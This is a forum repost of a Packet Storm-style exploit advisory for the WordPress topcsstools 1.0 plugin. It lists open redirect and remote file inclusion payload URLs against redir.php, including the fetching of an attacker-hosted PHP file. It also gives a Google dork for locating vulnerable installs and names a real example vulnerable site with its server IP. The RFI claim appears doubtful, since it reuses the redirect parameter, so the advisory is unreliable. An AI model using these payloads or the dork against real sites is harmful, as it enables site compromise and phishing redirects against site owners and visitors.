WordPress topcsstools 1.0 Open Redirection / Remote File Inclusion

#211
Topic created · 1 Posts · 1 Views
  • WordPress topcsstools plugin version 1.0 suffers from open redirection and remote file inclusion vulnerabilities.
    MD5 | 57f3ec1ca1ef194d2015913289b096f7
    Download

    #################################################################################  
    # Exploit Title : WordPress topcsstools Plugins 1.0 Remote File Inclusion  
    and Open Redirect  
    # Author [ Discovered By ] : KingSkrupellos  
    # Team : Cyberizm Digital Security Army  
    # Date : 14/01/2019  
    # Vendor Homepage : wordpress.org - cssgallery.com  
    # Software Information Links : cssgallery.com/premium-themes.html  
    + cssgallery.com/css-design.html  
    # Version : 1.0  
    # Tested On : Windows and Linux  
    # Category : WebApps  
    # Exploit Risk : Medium  
    # Google Dorks : inurl:''/wp-content/plugins/topcsstools/"  
    # Vulnerability Type : CWE-601 [ URL Redirection to Untrusted Site ('Open  
    Redirect') ]  
    CWE-98 [ Improper Control of Filename for Include/  
    Require Statement in PHP Program ('PHP Remote File Inclusion') ]  
    #################################################################################  
    # Open Redirection Exploit :  
    **************************  
    /wp-content/plugins/topcsstools/redir.php?u=https://  
    [OPEN-REDIRECT-ADDRESS-HERE.gov]  
    # RFI Remote File Inclusion Exploit :  
    **********************************  
    /wp-content/plugins/topcsstools/redir.php?u=http://  
    [RFI-ADDRESS-HERE.gov/yourfilename.php.txt]  
    #################################################################################  
    # Example Vulnerable Site :  
    *************************  
    [+]  
    cssgallery.com/wp-content/plugins/topcsstools/redir.php?u=https://packetstormsecurity.com  
    Note : (50.63.43.1) => There are 3,158 domains hosted on this server.  
    #################################################################################  
    # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team  
    #################################################################################  
    

    Source: packetstormsecurity.com

Log in to reply